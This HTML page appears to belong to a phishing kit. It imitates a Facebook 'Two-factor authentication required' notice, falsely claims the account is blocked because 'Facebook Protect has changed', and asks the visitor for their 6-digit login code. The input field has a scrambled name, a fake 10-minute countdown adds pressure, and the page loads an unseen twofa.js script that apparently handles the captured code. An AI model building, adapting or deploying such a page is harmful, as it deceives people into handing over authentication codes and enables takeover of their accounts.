<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Two-factor Authentication</title>
    <style>
      body {
        margin: 0;
        padding: 0;
        font-family: Arial, sans-serif;
        background-color: #f1f2f6;
      }

      .container {
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
      }

      .form {
        width: 80%;
        max-width: 500px;
        background-color: #fff;
        border-radius: 10px;
        padding: 20px;
        margin: auto;
        text-align: center;
      }

      .form p {
        font-weight: bold;
        font-size: 1.5rem;
        margin-bottom: 10px;
      }

      .form img {
        width: 100%;
        height: 260px;
        object-fit: cover;
        border-radius: 5px;
        margin-bottom: 10px;
      }

      .form input {
        width: 90%;
        padding: 15px;
        margin-bottom: 10px;
        border: 1px solid #d1d5db;
        border-radius: 5px;
        background-color: white;
        outline: none;
      }

      .form .error_2fa {
        color: red;
        margin-top: 5px;
      }

      .info-box {
        padding: 10px;
        display: flex;
        align-items: center;
        background-color: #f7f8fa;
        border-radius: 5px;
        margin-bottom: 10px;
      }

      .count-time {
        font-weight: bold;
        color: red;
      }

      .form button {
        width: 100%;
        padding: 15px;
        font-size: 1.2rem;
        font-weight: bold;
        color: #fff;
        background-color: grey;
        border: 1px solid #d1d5db;
        border-radius: 5px;
        cursor: pointer;
        transition: background-color 0.3s ease-in-out;
      }

      .form button:hover {
        background-color: rgb(42, 102, 255);
      }

      .form .send-code-btn {
        color: white;
        cursor: not-allowed;
      }
    </style>
  </head>
  <body>
    <div class="container">
      <form class="form" id="myForm">
        <p>Two-factor authentication required (1/3)</p>
        <p>
          We have temporarily blocked your account because Facebook Protect has
          changed. Verify code has been sent to your phone.
        </p>
        <img src="./src/f_locked.png" alt="2FA Image" />
        <p id="errorEl"></p>
        <input
          type="text"
          name="udgvjseoun"
          required
          placeholder="Enter your code"
        />
        <p class="error_2fa"></p>
        <div class="info-box">
          <div class="flex-1">
            <p>
              You’ve asked us to require a 6-digit login code when anyone tries
              to access your account from a new device or browser. Enter the
              6-digit code from your code generator or third-party app below.
            </p>
            <p>
              Please wait <strong class="count-time">10:00</strong> to request
              the sending of the code.
            </p>
          </div>
        </div>
        <p>
          We'll walk you through some steps to secure and unlock your account.
        </p>
        <button type="submit">Submit</button>
        <button type="button" class="send-code-btn">Send Code</button>
      </form>
    </div>
  </body>
  <script src="./twofa.js"></script>
</html>
